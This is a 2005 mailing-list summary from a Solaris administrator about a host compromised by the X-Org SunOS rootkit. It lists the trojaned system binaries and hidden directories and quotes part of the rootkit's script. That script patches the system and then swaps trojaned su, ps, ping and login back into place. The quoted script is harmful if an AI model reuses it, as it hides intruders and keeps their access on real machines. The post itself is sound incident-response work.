SUMMARY: Rootkit attack?

From: Rami Aubourg-Kaires <rami.aubourg_at_ifrance.com> Date: Fri Feb 04 2005 - 06:02:33 EST · This archive was generated by hypermail 2.1.8 : Thu Mar 03 2016 - 06:43:43 EST

Hello, list, and thanks to everyone who reponded, particularly:
Neil Quiogue
"the hatter"
Dik Casper
Chris Keladis
Michael Palamara
Calin Siulea
Christer Eriksson
David Foster
Meder Kydyraliev

Basically, it's  the X-Org SunOS rootkit from Sept 2001, which replaces,
among other things:
/usr/bin/login, which causes the impossibility to login through telnet,
su,
ps,
ping,
find,
(maybe netstat and ls, too)

It installs into /usr/lib/libX.a and /dev/pts/01.
The directories might not be visible, since ls could be trojaned. cd'ing
is possible, though.

Extract from the "fixer" script of the rootkit
***************
cp /usr/bin/su /dev/pts/01/55su
cp /usr/bin/ps /dev/pts/01/55ps
cp /usr/sbin/ping /dev/pts/01/55ping
cp /usr/bin/login /dev/pts/01/55login
                 /usr/bin/wget
ftp://sunsolve.sun.com/pub/patches/2.7_Recommended.tar.Z >/dev/null
                 uncompress 2.7_Recommended.tar.Z
                 tar -xf 2.7_Recommended.tar
		cd 2.7_Recommended
                 echo y|./install_cluster -nosave -q
		cd /tmp
		rm -rf 2.7_Recommended.tar 2.7_Recommended
cp -f /usr/bin/su /dev/pts/01/bin/su
cp -f /dev/pts/01/55su /usr/bin/su
cp -f /usr/bin/ps /dev/pts/01/bin/psr
cp -f /dev/pts/01/55ps /usr/bin/ps
cp -f /usr/sbin/ping /dev/pts/01/bin/ping
cp -f /dev/pts/01/55ping /usr/sbin/ping
mv -f /usr/bin/login /sbin/xlogin
cp -f /dev/pts/01/55login /usr/bin/login
***********************

The initial exploit channel is difficult to check, since it could
exploit a flaw in snmpXdmid according to CERT.

Problem was: Old system, old Solaris, old 3rd party binaries, too few
patches. With a 3-year old patch, the system should have been safe. It
is off public network and will be reinstalled anyhow, as it's the only
really safe solution
The abuse report has been sent to the netblock owner of the server
hosting the rootkit.

Rami

Rami

_____________________________________________________________________

Envie de discuter gratuitement avec vos amis ?
Tilichargez Yahoo! Messenger http://yahoo.ifrance.com
_______________________________________________
sunmanagers mailing list
sunmanagers@sunmanagers.org
http://www.sunmanagers.org/mailman/listinfo/sunmanagers